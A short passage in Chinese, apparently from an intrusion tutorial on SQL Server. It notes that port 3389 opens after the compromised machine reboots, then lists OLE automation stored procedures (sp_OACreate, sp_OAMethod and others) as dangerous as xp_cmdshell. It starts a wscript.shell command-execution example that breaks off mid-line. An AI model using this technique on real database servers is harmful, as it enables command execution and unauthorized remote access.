等被入侵机器重新启动后,就可以连接3389端口了。
还有OLE相关的一系列存储过程,这系列的存储过程有sp_OACreate,sp_OADestroy,sp_OAGetErrorInfo,sp_OAGetProperty,sp_OAMethod,sp_OASetProperty,sp_OAStop,这些存储过程和xp_cmdshell一样危险,使用方法:
DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP